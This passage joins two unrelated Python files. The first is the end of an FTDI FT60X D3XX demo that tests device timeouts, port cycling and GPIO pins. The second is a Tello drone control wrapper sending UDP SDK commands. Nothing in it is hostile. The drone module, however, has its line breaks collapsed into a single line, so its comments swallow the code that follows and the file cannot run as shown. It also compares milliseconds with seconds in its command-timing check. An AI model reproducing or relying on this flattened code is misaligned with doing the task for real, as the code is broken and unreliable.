    logging.debug("default timeout = %d" % timeoutMS)
    # set desired timeout for pipe 0x02
    D3XX.setPipeTimeout(pipe, timeoutMS*2)
    logging.debug("set timeout = %d" % (timeoutMS*2))
    # verify if timeout changed
    timeoutMSNew = D3XX.getPipeTimeout(pipe)
    logging.debug("new timeout = %d" % timeoutMSNew)
    if (timeoutMSNew != timeoutMS*2):
        return False
    # revert to original timeout
    D3XX.setPipeTimeout(pipe, timeoutMS)
    logging.debug("revert timeout = %d" % timeoutMS)
    D3XX.close()
    D3XX = 0
    return True

def DemoSuspendTimeout():
    """Get/set/verify/restore the device suspend timeout (windows only)."""
    if sys.platform == 'linux':
        return True
    logging.debug("Get set suspend timeout")
    D3XX = ftd3xx.create(0, _ft.FT_OPEN_BY_INDEX)
    if D3XX is None:
        logging.debug("ERROR: Please check if another D3XX application is open!")
        return False
    # get current timeout
    timeout = D3XX.getSuspendTimeout()
    logging.debug("default timeout = %d" % timeout)
    # set the desired timeout
    D3XX.setSuspendTimeout(timeout*2)
    logging.debug("set timeout = %d" % (timeout*2))
    # verify if timeout changed
    timeoutNew = D3XX.getSuspendTimeout()
    logging.debug("new timeout = %d" % timeoutNew)
    if (timeoutNew != timeout*2):
        return False
    # revert to original timeout
    D3XX.setSuspendTimeout(timeout)
    logging.debug("revert timeout = %d" % timeout)
    D3XX.close()
    D3XX = 0
    return True

def DemoCyclePort():
    """Reset (all platforms) and cycle (windows only) the device port,
    waiting for re-enumeration after each. Returns True on success."""
    # reset device port
    logging.debug("Reset device port")
    D3XX = ftd3xx.create(0, _ft.FT_OPEN_BY_INDEX)
    if D3XX is None:
        logging.debug("ERROR: Please check if another D3XX application is open!")
        return False
    D3XX.resetDevicePort()
    D3XX.close()
    D3XX = 0
    # wait until device has reenumerated
    DemoWaitForDeviceReenumeration()
    if sys.platform == 'win32':
        # cycle device port
        logging.debug("Cycle device port")
        D3XX = ftd3xx.create(0, _ft.FT_OPEN_BY_INDEX)
        if D3XX is None:
            logging.debug("ERROR: Please check if another D3XX application is open!")
            return False
        D3XX.cycleDevicePort()
        D3XX.close()
        D3XX = 0
        # wait until device has reenumerated
        DemoWaitForDeviceReenumeration()
    return True

def EnableBatteryChargingDetectionFeature(bEnable):
    """Toggle the battery-charging-detection feature bit and verify it
    after the device re-enumerates. Returns True on success."""
    D3XX = ftd3xx.create(0, _ft.FT_OPEN_BY_INDEX)
    if D3XX is None:
        logging.debug("ERROR: Please check if another D3XX application is open!")
        return False
    # get and display current chip configuration
    cfg = D3XX.getChipConfiguration()
    #DisplayChipConfiguration(cfg)
    # enable or disable battery charging detection
    # BatteryChargingGPIOConfig Default setting : 11100100b (0xE4 - FT_CONFIGURATION_DEFAULT_BATTERYCHARGING)
    # 7 - 6 : DCP = 11b (GPIO1 = 1 GPIO0 = 1)
    # 5 - 4 : CDP = 10b (GPIO1 = 1 GPIO0 = 0)
    # 3 - 2 : SDP = 01b (GPIO1 = 0 GPIO0 = 1)
    # 1 - 0 : Unknown/Off = 00b (GPIO1 = 0 GPIO0 = 0)
    if bEnable:
        cfg.OptionalFeatureSupport |= _ft.FT_CONFIGURATION_OPTIONAL_FEATURE_ENABLEBATTERYCHARGING
        cfg.BatteryChargingGPIOConfig |= _ft.FT_CONFIGURATION_DEFAULT_BATTERYCHARGING
    else:
        cfg.OptionalFeatureSupport &= ~_ft.FT_CONFIGURATION_OPTIONAL_FEATURE_ENABLEBATTERYCHARGING
    #DisplayChipConfiguration(cfg)
    D3XX.setChipConfiguration(cfg)
    D3XX.close()
    D3XX = 0
    # wait until device has reenumerated
    DemoWaitForDeviceReenumeration()
    # verify the chip configuration
    D3XX = ftd3xx.create(0, _ft.FT_OPEN_BY_INDEX)
    if D3XX is None:
        logging.debug("ERROR: Please check if another D3XX application is open!")
        return False
    cfg = D3XX.getChipConfiguration()
    DisplayChipConfiguration(cfg)
    D3XX.close()
    D3XX = 0
    if bEnable and not (cfg.OptionalFeatureSupport & _ft.FT_CONFIGURATION_OPTIONAL_FEATURE_ENABLEBATTERYCHARGING):
        return False
    return True

def DemoGpioBatteryCharging():
    """Enable battery-charging detection, read the charger type via the
    two GPIO pins, log it, then disable the feature again."""
    logging.debug("enable battery charging detection feature")
    EnableBatteryChargingDetectionFeature(True)
    D3XX = ftd3xx.create(0, _ft.FT_OPEN_BY_INDEX)
    if D3XX is None:
        logging.debug("ERROR: Please check if another D3XX application is open!")
        return False
    mask = _ft.FT_GPIO_MASK_GPIO_0 | _ft.FT_GPIO_MASK_GPIO_1
    # enable gpio by setting gpio direction
    direction = (_ft.FT_GPIO_DIRECTION_OUT << _ft.FT_GPIO_0) | (_ft.FT_GPIO_DIRECTION_OUT << _ft.FT_GPIO_1)
    D3XX.enableGPIO(mask, direction)
    # read gpio
    # BatteryChargingGPIOConfig Default setting : 11100100b (0xE4)
    # 7 - 6 : DCP = 11b (GPIO1 = 1 GPIO0 = 1)
    # 5 - 4 : CDP = 10b (GPIO1 = 1 GPIO0 = 0)
    # 3 - 2 : SDP = 01b (GPIO1 = 0 GPIO0 = 1)
    # 1 - 0 : Unknown/Off = 00b (GPIO1 = 0 GPIO0 = 0)
    # Since device is connected to a host machine, then we should get SDP (GPIO1 = 0 GPIO0 = 1)
    bcdtype = ['UNKNOWN', 'SDP - Standard Downstream Port', 'CDP - Charging Downstream Port', 'DCP - Dedicated Charging Port']
    data = D3XX.readGPIO()
    logging.debug("detected battery charging type: [%s]" % bcdtype[data])
    logging.debug("")
    D3XX.close()
    D3XX = 0
    logging.debug("disable battery charging detection feature")
    EnableBatteryChargingDetectionFeature(False)
    return True

def DemoGpioSetGet():
    """Exercise GPIO direction, pull, write and read-back on pins 0 and 1."""
    if sys.platform == 'linux':
        DemoTurnOffPipeThreads()
    D3XX = ftd3xx.create(0, _ft.FT_OPEN_BY_INDEX)
    if D3XX is None:
        logging.debug("ERROR: Please check if another D3XX application is open!")
        return False
    mask = _ft.FT_GPIO_MASK_GPIO_0 | _ft.FT_GPIO_MASK_GPIO_1
    # enable gpio by setting gpio direction
    direction = (_ft.FT_GPIO_DIRECTION_OUT << _ft.FT_GPIO_0) | (_ft.FT_GPIO_DIRECTION_OUT << _ft.FT_GPIO_1)
    D3XX.enableGPIO(mask, direction)
    logging.debug("enable gpio[gpio0: %d, gpio1: %d]" %
        (direction & _ft.FT_GPIO_MASK_GPIO_0, (direction & _ft.FT_GPIO_MASK_GPIO_1) >> _ft.FT_GPIO_1))
    # set gpio pull both high
    pull = (_ft.FT_GPIO_PULL_HIGH << _ft.FT_GPIO_0) | (_ft.FT_GPIO_PULL_HIGH << _ft.FT_GPIO_1)
    D3XX.setGPIOPull(mask, pull)
    logging.debug("pull gpio [gpio0: %d, gpio1: %d]" %
        (pull & _ft.FT_GPIO_MASK_GPIO_0, (pull & _ft.FT_GPIO_MASK_GPIO_1) >> _ft.FT_GPIO_1))
    # read gpio
    data = D3XX.readGPIO()
    logging.debug("read gpio [gpio0: %d, gpio1: %d]" %
        (data & _ft.FT_GPIO_MASK_GPIO_0, (data & _ft.FT_GPIO_MASK_GPIO_1) >> _ft.FT_GPIO_1))
    # write gpio both low
    data = (_ft.FT_GPIO_VALUE_LOW << _ft.FT_GPIO_0) | (_ft.FT_GPIO_VALUE_LOW << _ft.FT_GPIO_1)
    D3XX.writeGPIO(mask, data)
    logging.debug("write gpio [gpio0: %d, gpio1: %d]" %
        (data & _ft.FT_GPIO_MASK_GPIO_0, (data & _ft.FT_GPIO_MASK_GPIO_1) >> _ft.FT_GPIO_1))
    # read gpio
    data = D3XX.readGPIO()
    logging.debug("read gpio [gpio0: %d, gpio1: %d]" %
        (data & _ft.FT_GPIO_MASK_GPIO_0, (data & _ft.FT_GPIO_MASK_GPIO_1) >> _ft.FT_GPIO_1))
    # write gpio both high
    data = (_ft.FT_GPIO_VALUE_HIGH << _ft.FT_GPIO_0) | (_ft.FT_GPIO_VALUE_HIGH << _ft.FT_GPIO_1)
    D3XX.writeGPIO(mask, data)
    logging.debug("write gpio [gpio0: %d, gpio1: %d]" %
        (data & _ft.FT_GPIO_MASK_GPIO_0, (data & _ft.FT_GPIO_MASK_GPIO_1) >> _ft.FT_GPIO_1))
    # read gpio
    data = D3XX.readGPIO()
    logging.debug("read gpio [gpio0: %d, gpio1: %d]" %
        (data & _ft.FT_GPIO_MASK_GPIO_0, (data &
         _ft.FT_GPIO_MASK_GPIO_1) >> _ft.FT_GPIO_1))
    D3XX.close()
    D3XX = 0
    logging.debug("")
    return True

def DemoGpio():
    """Run the GPIO demos; battery-charging detection is windows only."""
    result = DemoGpioSetGet()
    if sys.platform == 'win32':
        if result == True:
            result = DemoGpioBatteryCharging()
    return result

def GetOSVersion():
    """Return a friendly OS name (windows via version table, else uname)."""
    if (sys.platform == 'win32'):
        verList = [("Windows 7", 6, 1), ("Windows 8", 6, 2), ("Windows 8.1", 6, 3), ("Windows 10", 10, 0)]
        ver = sys.getwindowsversion()
        elemList = [elem for index, elem in enumerate(verList) if ver.major == elem[1] and ver.minor == elem[2]]
        # fall back to the OS env var for versions not in the table
        return elemList[0][0] if len(elemList) == 1 else os.getenv("OS")
    return os.uname()[0]

def GetOSArchitecture():
    """Return the processor architecture string."""
    if (sys.platform == 'win32'):
        return os.environ["PROCESSOR_ARCHITECTURE"]
    return platform.machine()

def GetComputername():
    """Return the machine's host name."""
    if (sys.platform == 'win32'):
        return os.getenv('COMPUTERNAME')
    return platform.node()

def GetUsername():
    """Return the current user name."""
    if (sys.platform == 'win32'):
        return os.getenv('USERNAME')
    import pwd  # pwd is POSIX-only, hence the local import
    return pwd.getpwuid(os.getuid())[0]

def main():
    """Run the enabled demo test cases against the single attached device.

    Returns True when every executed test case succeeded.
    """
    # check connected devices
    numDevices = DemoGetNumDevicesConnected()
    if (numDevices != 1):
        logging.debug("ERROR: Please check environment setup! %d device(s) detected."
            % numDevices)
        return False
    # list the test cases (commented entries are disabled)
    testCases = [
        # (DemoEnumerateDevices, "DemoEnumerateDevices"),
        # (DemoOpenDeviceBy, "DemoOpenDeviceBy"),
        # (DemoVersions, "DemoVersions"),
        # (DemoDescriptors, "DemoDescriptors"),
        (DemoChipConfiguration, "DemoChipConfiguration"),
        (DemoTransfer, "DemoTransfer"),
        # (DemoPipeTimeout, "DemoPipeTimeout"),
        # (DemoSuspendTimeout, "DemoSuspendTimeout"),
        # (DemoCyclePort, "DemoCyclePort"),
        # (DemoGpio, "DemoGpio"),
    ]
    # execute the test cases
    fails = success = 0
    for test in testCases:
        logging.debug("--------------------------------------------------------------")
        logging.debug("%s" % test[1])
        logging.debug("--------------------------------------------------------------")
        start = datetime.datetime.now()
        logging.debug("Start time,%s" % start)
        logging.debug("")
        result = test[0]()
        stop = datetime.datetime.now()
        logging.debug("")
        logging.debug("Stop time,%s" % stop)
        if result == True:
            logging.debug("Status,SUCCESS")
            success += 1
        else:
            logging.debug("Status,FAILED")
            fails += 1
        logging.debug("")
        logging.debug("")
    # display summary count
    logging.debug("--------------------------------------------------------------")
    logging.debug("Summary")
    logging.debug("--------------------------------------------------------------")
    logging.debug("Summary Log Counts,[ Fails (%d); Success (%d) ]" % (fails, success))
    logging.debug("")
    logging.debug("")
    if sys.platform == 'win32':
        DemoResetChipConfiguration(False)
    return fails == 0

if __name__ == "__main__":
    # initialize logging to log in both console and file
    logging.basicConfig(filename='apiusage.log', filemode='w', level=logging.DEBUG, format='[%(asctime)s] %(message)s')
    logging.getLogger().addHandler(logging.StreamHandler())
    logging.debug("")
    logging.debug("**************************************************************")
    logging.debug("FT60X D3XX PYTHON API USAGE DEMO")
    logging.debug("WORKSTATION,%s" % GetComputername())
    logging.debug("OSVERSION,%s,%s" % (GetOSVersion(), GetOSArchitecture()))
    logging.debug("OPERATOR,%s" % GetUsername())
    logging.debug("DATE,%s" % datetime.datetime.now().strftime("%Y-%m-%d"))
    logging.debug("TIME,%s" % datetime.datetime.now().strftime("%H:%M:%S"))
    logging.debug("PYTHON,%d.%d.%d" % (sys.version_info.major, sys.version_info.minor, sys.version_info.micro))
    logging.debug("**************************************************************")
    logging.debug("")
    logging.debug("")
    logging.debug("")
    logging.debug("")
    main()
# tello_module.py
# coding=utf-8 import logging import socket import time import threading import cv2 from threading import Thread drones = None client_socket = None class Tello: """Python wrapper to interact with the Ryze Tello drone using the official Tello api. Tello API documentation: https://dl-cdn.ryzerobotics.com/downloads/tello/20180910/Tello%20SDK%20Documentation%20EN_1.3.pdf https://dl-cdn.ryzerobotics.com/downloads/Tello/Tello%20SDK%202.0%20User%20Guide.pdf """ # Send and receive commands, client socket RESPONSE_TIMEOUT = 7 # in seconds TIME_BTW_COMMANDS = 1 # in seconds TIME_BTW_RC_CONTROL_COMMANDS = 0.5 # in seconds RETRY_COUNT = 3 last_received_command = time.time() HANDLER = logging.StreamHandler() FORMATTER = logging.Formatter('%(filename)s - %(lineno)d - %(message)s') HANDLER.setFormatter(FORMATTER) LOGGER = logging.getLogger('djitellopy') LOGGER.addHandler(HANDLER) LOGGER.setLevel(logging.INFO) # use logging.getLogger('djitellopy').setLevel(logging.<LEVEL>) in YOUR CODE # to only receive logs of the desired level and higher # Video stream, server socket VS_UDP_IP = '0.0.0.0' VS_UDP_PORT = 11111 CONTROL_UDP_PORT = 8889 STATE_UDP_PORT = 8890 # conversion functions for state protocol fields state_field_converters = { # Tello EDU with mission pads enabled only 'mid': int, 'x': int, 'y': int, 'z': int, # 'mpry': (custom format 'x,y,z') # common entries 'pitch': int, 'roll': int, 'yaw': int, 'vgx': int, 'vgy': int, 'vgz': int, 'templ': int, 'temph': int, 'tof': int, 'h': int, 'bat': int, 'baro': float, 'time': int, 'agx': float, 'agy': float, 'agz': float, } # VideoCapture object cap = None background_frame_read = None stream_on = False is_flying = False def __init__(self, host='192.168.10.1', retry_count=3): global drones self.address = (host, Tello.CONTROL_UDP_PORT) self.stream_on = False self.retry_count = retry_count if drones is None: drones = {} # Run tello udp receiver on background thread1 = threading.Thread( target=Tello.udp_response_receiver, args=()) # Run 
state reciever on background thread2 = threading.Thread( target=Tello.udp_state_receiver, args=()) thread1.daemon = True thread2.daemon = True thread1.start() thread2.start() drones[host] = { 'responses': [], 'state': {}, } def get_own_udp_object(self): global drones host = self.address[0] return drones[host] @staticmethod def udp_response_receiver(): """Setup drone UDP receiver. This method listens for responses of Tello. Must be run from a background thread in order to not block the main thread.""" global client_socket client_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) client_socket.bind(('', Tello.CONTROL_UDP_PORT)) while True: try: data, address = client_socket.recvfrom(1024) address = address[0] if address not in drones: continue drones[address]['responses'].append(data) except Exception as e: Tello.LOGGER.error(e) break @staticmethod def udp_state_receiver(): """Setup state UDP receiver. This method listens for state infor from the Tello. Must be run from a background thread in order to not block the main thread.""" state_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) state_socket.bind(('', Tello.STATE_UDP_PORT)) while True: try: data, address = state_socket.recvfrom(1024) address = address[0] if address not in drones: continue drones[address]['state'] = Tello.parse_state(data) except Exception as e: Tello.LOGGER.error(e) break @staticmethod def parse_state(state: str) -> dict: """Parse a state line to a dict""" state = state.decode('ASCII').strip() if state == 'ok': return {} state_obj = {} for field in state.split(';'): split = field.split(':') if len(split) < 2: continue key = split[0] value = split[1] if key in Tello.state_field_converters: try: value = Tello.state_field_converters[key](value) except Exception as e: Tello.LOGGER.error(e) state_obj[key] = value return state_obj def get_current_state(self) -> dict: """Call this function to attain the state of the Tello. 
Returns a dict with all fields""" return self.get_own_udp_object()['state'] def get_state_field(self, key: str) -> any: state = self.get_current_state() if key in state: return state[key] else: raise Exception('Could not get state property ' + key) def get_mission_pad_id(self) -> int: """Mission pad ID of the currently detected mission pad Only available on Tello EDUs after calling enable_mission_pads Returns: int: -1 if none is detected, else 1-8 """ return self.get_state_field('mid') def get_mission_pad_distance_x(self) -> int: """X distance to current mission pad Only available on Tello EDUs after calling enable_mission_pads Returns: int: distance in cm """ return self.get_state_field('x') def get_mission_pad_distance_y(self) -> int: """Y distance to current mission pad Only available on Tello EDUs after calling enable_mission_pads Returns: int: distance in cm """ return self.get_state_field('y') def get_mission_pad_distance_z(self) -> int: """Z distance to current mission pad Only available on Tello EDUs after calling enable_mission_pads Returns: int: distance in cm """ return self.get_state_field('z') def get_pitch(self) -> int: """Get pitch in degree Returns: int: pitch in degree """ return self.get_state_field('pitch') def get_roll(self) -> int: """Get roll in degree Returns: int: roll in degree """ return self.get_state_field('roll') def get_yaw(self) -> int: """Get yaw in degree Returns: int: yaw in degree """ return self.get_state_field('yaw') def get_speed_x(self) -> int: """X-Axis Speed Returns: int: speed """ return self.get_state_field('vgx') def get_speed_y(self) -> int: """Y-Axis Speed Returns: int: speed """ return self.get_state_field('vgy') def get_speed_z(self) -> int: """Z-Axis Speed Returns: int: speed """ return self.get_state_field('vgz') def get_acceleration_x(self) -> float: """X-Axis Acceleration Returns: float: acceleration """ return self.get_state_field('agx') def get_acceleration_y(self) -> float: """Y-Axis Acceleration Returns: 
float: acceleration """ return self.get_state_field('agy') def get_acceleration_z(self) -> float: """Z-Axis Acceleration Returns: float: acceleration """ return self.get_state_field('agz') def get_height(self) -> int: """Get current height in cm Returns: int: height in cm """ return self.get_state_field('h') def get_battery(self) -> int: """Get current battery percentage Returns: False: Unsuccessful int: 0-100 """ return self.get_state_field('bat') def get_udp_video_address(self) -> str: # + '?overrun_nonfatal=1&fifo_size=5000' return 'udp://@' + self.VS_UDP_IP + ':' + str(self.VS_UDP_PORT) def get_video_capture(self): """Get the VideoCapture object from the camera drone Returns: VideoCapture """ if self.cap is None: self.cap = cv2.VideoCapture(self.get_udp_video_address()) if not self.cap.isOpened(): self.cap.open(self.get_udp_video_address()) return self.cap def get_frame_read(self) -> 'BackgroundFrameRead': """Get the BackgroundFrameRead object from the camera drone. Then, you just need to call backgroundFrameRead.frame to get the actual frame received by the drone. Returns: BackgroundFrameRead """ if self.background_frame_read is None: self.background_frame_read = BackgroundFrameRead( self, self.get_udp_video_address()).start() return self.background_frame_read def stop_video_capture(self): return self.streamoff() def send_command_with_return(self, command: str, printinfo: bool = True, timeout: int = RESPONSE_TIMEOUT) -> str: """Send command to Tello and wait for its response. Return: bool: True for successful, False for unsuccessful """ # Commands very consecutive makes the drone not respond to them. 
So wait at least self.TIME_BTW_COMMANDS seconds diff = time.time() * 1000 - self.last_received_command if diff < self.TIME_BTW_COMMANDS: time.sleep(diff) if printinfo: self.LOGGER.info('Send command: ' + command) timestamp = int(time.time() * 1000) client_socket.sendto(command.encode('utf-8'), self.address) responses = self.get_own_udp_object()['responses'] while len(responses) == 0: if (time.time() * 1000) - timestamp > self.RESPONSE_TIMEOUT * 1000: self.LOGGER.warning('Timeout exceed on command ' + command) return False else: time.sleep(0.1) response = responses.pop(0) response = response.decode('utf-8').rstrip("\r\n") if printinfo: self.LOGGER.info('Response {}: {}'.format(command, response)) self.response = None self.last_received_command = time.time() * 1000 return response def send_command_without_return(self, command: str): """Send command to Tello without expecting a response. Use this method when you want to send a command continuously - go x y z speed: Tello fly to x y z in speed (cm/s) x: 20-500 y: 20-500 z: 20-500 speed: 10-100 - curve x1 y1 z1 x2 y2 z2 speed: Tello fly a curve defined by the current and two given coordinates with speed (cm/s). If the arc radius is not within the range of 0.5-10 meters, it responses false. x/y/z can’t be between -20 – 20 at the same time . x1, x2: 20-500 y1, y2: 20-500 z1, z2: 20-500 speed: 10-60 - rc a b c d: Send RC control via four channels. a: left/right (-100~100) b: forward/backward (-100~100) c: up/down (-100~100) d: yaw (-100~100) """ # Commands very consecutive makes the drone not respond to them. So wait at least self.TIME_BTW_COMMANDS seconds self.LOGGER.info('Send command (no expect response): ' + command) client_socket.sendto(command.encode('utf-8'), self.address) def send_control_command(self, command: str, timeout: int = RESPONSE_TIMEOUT) -> str: """Send control command to Tello and wait for its response. 
Possible control commands: - command: entry SDK mode - takeoff: Tello auto takeoff - land: Tello auto land - streamon: Set video stream on - streamoff: Set video stream off - emergency: Stop all motors immediately - up x: Tello fly up with distance x cm. x: 20-500 - down x: Tello fly down with distance x cm. x: 20-500 - left x: Tello fly left with distance x cm. x: 20-500 - right x: Tello fly right with distance x cm. x: 20-500 - forward x: Tello fly forward with distance x cm. x: 20-500 - back x: Tello fly back with distance x cm. x: 20-500 - cw x: Tello rotate x degree clockwise x: 1-3600 - ccw x: Tello rotate x degree counter- clockwise. x: 1-3600 - flip x: Tello fly flip x l (left) r (right) f (forward) b (back) - speed x: set speed to x cm/s. x: 10-100 - wifi ssid pass: Set Wi-Fi with SSID password Return: bool: True for successful, False for unsuccessful """ response = None for i in range(0, self.retry_count): response = self.send_command_with_return(command, timeout=timeout) if response == 'OK' or response == 'ok': return True return self.raise_result_error(command, response) def send_read_command(self, command: str, printinfo: bool = True) -> str: """Send set command to Tello and wait for its response. 
Possible set commands: - speed?: get current speed (cm/s): x: 1-100 - battery?: get current battery percentage: x: 0-100 - time?: get current fly time (s): time - height?: get height (cm): x: 0-3000 - temp?: get temperature (°C): x: 0-90 - attitude?: get IMU attitude data: pitch roll yaw - baro?: get barometer value (m): x - tof?: get distance value from TOF (cm): x: 30-1000 - wifi?: get Wi-Fi SNR: snr Return: bool: The requested value for successful, False for unsuccessful """ response = self.send_command_with_return(command, printinfo=printinfo) try: response = str(response) except TypeError as e: self.LOGGER.error(e) pass if ('error' not in response) and ('ERROR' not in response) and ('False' not in response): if response.isdigit(): return int(response) else: try: # isdigit() is False when the number is a float(barometer) return float(response) except ValueError: return response else: return self.raise_result_error(command, response) def raise_result_error(self, command: str, response: any) -> bool: raise Exception('Command ' + command + ' was unsuccessful. Message: ' + str(response)) def connect(self): """Entry SDK mode Returns: bool: True for successful, False for unsuccessful """ return self.send_control_command("command") def takeoff(self): """Tello auto takeoff Returns: bool: True for successful, False for unsuccessful False: Unsuccessful """ # Something it takes a looooot of time to take off and return a succesful take off. So we better wait. If not, is going to give us error on the following calls. if self.send_control_command("takeoff", timeout=20): self.is_flying = True return True else: return False def land(self): """Tello auto land Returns: bool: True for successful, False for unsuccessful """ if self.send_control_command("land"): self.is_flying = False return True else: return False def streamon(self): """Set video stream on. If the response is 'Unknown command' means you have to update the Tello firmware. That can be done through the Tello app. 
Returns: bool: True for successful, False for unsuccessful """ result = self.send_control_command("streamon") if result is True: self.stream_on = True return result def streamoff(self): """Set video stream off Returns: bool: True for successful, False for unsuccessful """ result = self.send_control_command("streamoff") if result is True: self.stream_on = False return result def emergency(self): """Stop all motors immediately Returns: bool: True for successful, False for unsuccessful """ return self.send_control_command("emergency") def move(self, direction: str, x: int): """Tello fly up, down, left, right, forward or back with distance x cm. Arguments: direction: up, down, left, right, forward or back x: 20-500 Returns: bool: True for successful, False for unsuccessful """ return self.send_control_command(direction + ' ' + str(x)) def move_up(self, x: int): """Tello fly up with distance x cm. Arguments: x: 20-500 Returns: bool: True for successful, False for unsuccessful """ return self.move("up", x) def move_down(self, x: int): """Tello fly down with distance x cm. Arguments: x: 20-500 Returns: bool: True for successful, False for unsuccessful """ return self.move("down", x) def move_left(self, x: int): """Tello fly left with distance x cm. Arguments: x: 20-500 Returns: bool: True for successful, False for unsuccessful """ return self.move("left", x) def move_right(self, x: int): """Tello fly right with distance x cm. Arguments: x: 20-500 Returns: bool: True for successful, False for unsuccessful """ return self.move("right", x) def move_forward(self, x: int): """Tello fly forward with distance x cm. Arguments: x: 20-500 Returns: bool: True for successful, False for unsuccessful """ return self.move("forward", x) def move_back(self, x: int): """Tello fly back with distance x cm. Arguments: x: 20-500 Returns: bool: True for successful, False for unsuccessful """ return self.move("back", x) def rotate_clockwise(self, x: int): """Tello rotate x degree clockwise. 
Arguments: x: 1-360 Returns: bool: True for successful, False for unsuccessful """ return self.send_control_command("cw " + str(x)) def rotate_counter_clockwise(self, x: int): """Tello rotate x degree counter-clockwise. Arguments: x: 1-360 Returns: bool: True for successful, False for unsuccessful """ return self.send_control_command("ccw " + str(x)) def flip(self, direction: str): """Tello fly flip. Arguments: direction: l (left), r (right), f (forward) or b (back) Returns: bool: True for successful, False for unsuccessful """ return self.send_control_command("flip " + direction) def flip_left(self): """Tello fly flip left. Returns: bool: True for successful, False for unsuccessful """ return self.flip("l") def flip_right(self): """Tello fly flip left. Returns: bool: True for successful, False for unsuccessful """ return self.flip("r") def flip_forward(self): """Tello fly flip left. Returns: bool: True for successful, False for unsuccessful """ return self.flip("f") def flip_back(self): """Tello fly flip left. Returns: bool: True for successful, False for unsuccessful """ return self.flip("b") def go_xyz_speed(self, x: int, y: int, z: int, speed: int): """Tello fly to x y z in speed (cm/s) Arguments: x: 20-500 y: 20-500 z: 20-500 speed: 10-100 Returns: bool: True for successful, False for unsuccessful """ return self.send_command_without_return('go %s %s %s %s' % (x, y, z, speed)) def curve_xyz_speed(self, x1: int, y1: int, z1: int, x2: int, y2: int, z2: int, speed: int): """Tello fly a curve defined by the current and two given coordinates with speed (cm/s). - If the arc radius is not within the range of 0.5-10 meters, it responses false. - x/y/z can’t be between -20 – 20 at the same time. 
Arguments: x1: 20-500 x2: 20-500 y1: 20-500 y2: 20-500 z1: 20-500 z2: 20-500 speed: 10-60 Returns: bool: True for successful, False for unsuccessful """ return self.send_command_without_return('curve %s %s %s %s %s %s %s' % (x1, y1, z1, x2, y2, z2, speed)) def go_xyz_speed_mid(self, x: int, y: int, z: int, speed: int, mid: int): """Tello fly to x y z in speed (cm/s) relative to mission pad iwth id mid Arguments: x: -500-500 y: -500-500 z: -500-500 speed: 10-100 mid: 1-8 Returns: bool: True for successful, False for unsuccessful """ return self.send_control_command('go %s %s %s %s m%s' % (x, y, z, speed, mid)) def curve_xyz_speed_mid(self, x1: int, y1: int, z1: int, x2: int, y2: int, z2: int, speed: int, mid: int): """Tello fly to x2 y2 z2 over x1 y1 z1 in speed (cm/s) relative to mission pad with id mid Arguments: x1: -500-500 y1: -500-500 z1: -500-500 x2: -500-500 y2: -500-500 z2: -500-500 speed: 10-60 mid: 1-8 Returns: bool: True for successful, False for unsuccessful """ return self.send_control_command('curve %s %s %s %s %s %s %s m%s' % (x1, y1, z1, x2, y2, z2, speed, mid)) def go_xyz_speed_yaw_mid(self, x: int, y: int, z: int, speed: int, yaw: int, mid1: int, mid2: int): """Tello fly to x y z in speed (cm/s) relative to mid1 Then fly to 0 0 z over mid2 and rotate to yaw relative to mid2's rotation Arguments: x: -500-500 y: -500-500 z: -500-500 speed: 10-100 yaw: -360-360 mid1: 1-8 mid2: 1-8 Returns: bool: True for successful, False for unsuccessful """ return self.send_control_command('jump %s %s %s %s %s m%s m%s' % (x, y, z, speed, yaw, mid1, mid2)) def enable_mission_pads(self): return self.send_control_command("mon") def disable_mission_pads(self): return self.send_control_command("moff") def set_mission_pad_detection_direction(self, x): return self.send_control_command("mdirection " + str(x)) def set_speed(self, x: int): """Set speed to x cm/s. 
Arguments: x: 10-100 Returns: bool: True for successful, False for unsuccessful """ return self.send_control_command("speed " + str(x)) last_rc_control_sent = 0 def send_rc_control(self, left_right_velocity: int, forward_backward_velocity: int, up_down_velocity: int, yaw_velocity: int): """Send RC control via four channels. Command is sent every self.TIME_BTW_RC_CONTROL_COMMANDS seconds. Arguments: left_right_velocity: -100~100 (left/right) forward_backward_velocity: -100~100 (forward/backward) up_down_velocity: -100~100 (up/down) yaw_velocity: -100~100 (yaw) Returns: bool: True for successful, False for unsuccessful """ if int(time.time() * 1000) - self.last_rc_control_sent < self.TIME_BTW_RC_CONTROL_COMMANDS: pass else: self.last_rc_control_sent = int(time.time() * 1000) return self.send_command_without_return('rc %s %s %s %s' % (self.round_to_100(left_right_velocity), self.round_to_100( forward_backward_velocity), self.round_to_100( up_down_velocity), self.round_to_100(yaw_velocity))) def round_to_100(self, x: int): if x > 100: return 100 elif x < -100: return -100 else: return x def set_wifi_credentials(self, ssid, password): """Set the Wi-Fi SSID and password. The Tello will reboot afterwords. Returns: bool: True for successful, False for unsuccessful """ return self.send_control_command('wifi %s %s' % (ssid, password)) def connect_to_wifi(self, ssid, password): """Connects to the Wi-Fi with SSID and password. After this command the tello will reboot Only works on Tello EDU Returns: bool: True for successful, False for unsuccessful """ return self.send_control_command('ap %s %s' % (ssid, password)) def get_speed(self) -> int: """Query speed setting (cm/s) Returns: False: Unsuccessful int: 1-100 """ return self.send_read_command('speed?') def query_battery(self) -> int: """Get current battery percentage via a query command. 
Using get_battery is usually faster Returns: False: Unsuccessful int: 0-100 """ return self.send_read_command('battery?') def get_flight_time(self) -> int: """Query current fly time (s) Returns: False: Unsuccessful int: Seconds elapsed during flight. """ return self.send_read_command('time?') def query_height(self) -> int: """Get height in cm via a query command Using get_height is usually faster Returns: False: Unsuccessful int: 0-3000 """ return self.send_read_command('height?') def get_temperature(self) -> int: """Query temperature (°C) Returns: False: Unsuccessful int: 0-90 """ return self.send_read_command('temp?') def get_attitude(self) -> dict: """Query IMU attitude data Returns: False: Unsuccessful {'pitch': int, 'roll': int, 'yaw': int} """ r = self.send_read_command('attitude?').replace(';', ':').split(':') # {'pitch': xxx, 'roll': xxx, 'yaw': xxx} return dict(zip(r[::2], [int(i) for i in r[1::2]])) def get_barometer(self) -> int: """Get barometer value (m) Returns: False: Unsuccessful int: 0-100 """ return self.send_read_command('baro?') def get_distance_tof(self) -> int: """Get distance value from TOF (cm) Returns: False: Unsuccessful int: 30-1000 """ return self.send_read_command('tof?') def get_wifi(self) -> str: """Get Wi-Fi SNR Returns: False: Unsuccessful str: snr """ return self.send_read_command('wifi?') def get_sdk_version(self) -> str: """Get SDK Version Returns: False: Unsuccessful str: SDK Version """ return self.send_read_command('sdk?') def get_serial_number(self) -> str: """Get Serial Number Returns: False: Unsuccessful str: Serial Number """ return self.send_read_command('sn?') def end(self): """Call this method when you want to end the tello object""" if 